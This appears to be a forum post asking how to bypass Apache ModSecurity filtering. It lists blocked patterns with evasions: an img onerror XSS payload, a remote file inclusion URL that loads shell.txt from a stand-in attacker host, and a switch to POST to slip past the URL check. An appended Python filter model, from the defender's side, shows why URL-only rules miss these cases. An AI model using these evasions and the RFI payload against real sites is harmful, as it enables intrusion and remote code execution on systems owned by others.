moubik

apache mod_secure: how do we get past it / what does it block?

I have never configured a mod_secure for Apache.

From what I have read, you create some rules for it, and it blocks requests based on them.

I would like us to make a list of what it usually blocks (the default list), and how to get past these.

When mod_secure blocks a request, a page like this appears:

Not Acceptable

An appropriate representation of the requested resource / could not be found on this server.

Apache/1.3.37 Server at www.site.com Port 80

It blocks:

- requests for /etc/passwd and everything like ../../../etc/passwd - I don't know how to bypass this

- <script>alert(1)</script>

# this can be bypassed with <img=http:// onerror="alert(1)">

- if there are 2 "?" in the URL

We know this shows up when we try to do an RFI, so the URL looks something like:

http://www.vulnerable.com/index.php?page=http://hacker.com/shell.txt?

# I bypass this one with a PHP script that uses only POST instead of GET

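An added example, not part of the original post and not ModSecurity's own rule set: a small Python model of the filtering described above, written from the defender's side to show why checks that look only at the URL and only for `<script>` miss the two cases the post reports, and what a filter has to inspect to cover them. The function names, rule names, regular expressions and the `search.php?q=` sample are assumptions made for illustration, and the request body is assumed to be form-encoded.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Illustrative patterns (assumptions), not ModSecurity's shipped rules.
RULES = {
    "traversal": re.compile(r"\.\./|/etc/passwd"),
    "script-tag": re.compile(r"<\s*script", re.I),
    "event-handler": re.compile(r"<[^>]*\bon\w+\s*=", re.I),
    "remote-url-param": re.compile(r"^\s*(?:https?|ftp)://", re.I),
}

def narrow_filter(method, url, body=""):
    """URL-only checks matching the behaviour described in the post."""
    raw = unquote(url)
    hits = {n for n in ("traversal", "script-tag") if RULES[n].search(raw)}
    if raw.count("?") >= 2:
        hits.add("double-question-mark")
    return hits

def request_values(method, url, body=""):
    """Collect the decoded path plus every query and form-body value."""
    parts = urlsplit(url)
    values = [unquote(parts.path)]
    values += [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    if method.upper() == "POST":
        # Assumes application/x-www-form-urlencoded.
        values += [v for _, v in parse_qsl(body, keep_blank_values=True)]
    return values

def broad_filter(method, url, body=""):
    """Apply every rule to each value, whichever part of the request holds it."""
    hits = narrow_filter(method, url)
    for value in request_values(method, url, body):
        hits |= {name for name, rx in RULES.items() if rx.search(value)}
    return hits

if __name__ == "__main__":
    # Constructed samples built from the strings quoted in the post.
    samples = [
        ("GET", "http://www.site.com/index.php?page=../../../etc/passwd", ""),
        ("GET", 'http://www.site.com/search.php?q=<img=http:// onerror="alert(1)">', ""),
        ("GET", "http://www.vulnerable.com/index.php?page=http://hacker.com/shell.txt?", ""),
        ("POST", "http://www.vulnerable.com/index.php", "page=http://hacker.com/shell.txt?"),
    ]
    for method, url, body in samples:
        print(method, sorted(narrow_filter(method, url, body)),
              sorted(broad_filter(method, url, body)))
```

The design point is that the hardened filter keys on where a value can arrive and what it is, not on a side effect such as the count of `?` characters in a GET URL.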
